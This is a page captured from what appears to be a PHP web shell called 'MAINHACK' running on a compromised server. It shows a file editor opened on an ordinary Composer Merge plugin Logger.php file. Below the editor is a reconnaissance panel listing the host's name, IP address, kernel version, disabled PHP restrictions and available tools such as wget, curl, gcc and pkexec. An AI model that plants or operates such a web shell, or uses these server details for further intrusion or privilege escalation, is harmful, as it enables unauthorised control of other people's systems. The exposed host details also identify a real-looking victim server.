[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Logger.php
<?php /** * This file is part of the Composer Merge plugin. * * Copyright (C) 2015 Bryan Davis, Wikimedia Foundation, and contributors * * This software may be modified and distributed under the terms of the MIT * license. See the LICENSE file for details. */ namespace Wikimedia\Composer\Merge\V2; use Composer\IO\IOInterface; /** * Simple logging wrapper for Composer\IO\IOInterface * * @author Bryan Davis <bd808@bd808.com> */ class Logger { /** * @var string $name */ protected $name; /** * @var IOInterface $inputOutput */ protected $inputOutput; /** * @param string $name * @param IOInterface $io */ public function __construct($name, IOInterface $io) { $this->name = $name; $this->inputOutput = $io; } /** * Log a debug message * * Messages will be output at the "very verbose" logging level (eg `-vv` * needed on the Composer command). * * @param string $message */ public function debug($message) { if ($this->inputOutput->isVeryVerbose()) { $message = " <info>[{$this->name}]</info> {$message}"; $this->log($message); } } /** * Log an informative message * * Messages will be output at the "verbose" logging level (eg `-v` needed * on the Composer command). * * @param string $message */ public function info($message) { if ($this->inputOutput->isVerbose()) { $message = " <info>[{$this->name}]</info> {$message}"; $this->log($message); } } /** * Log a warning message * * @param string $message */ public function warning($message) { $message = " <error>[{$this->name}]</error> {$message}"; $this->log($message); } /** * Write a message * * @param string $message */ public function log($message) { if (method_exists($this->inputOutput, 'writeError')) { $this->inputOutput->writeError($message); } else { // @codeCoverageIgnoreStart // Backwards compatibility for Composer before cb336a5 $this->inputOutput->write($message); // @codeCoverageIgnoreEnd } } } // vim:sw=4:ts=4:sts=4:et:
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.88 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002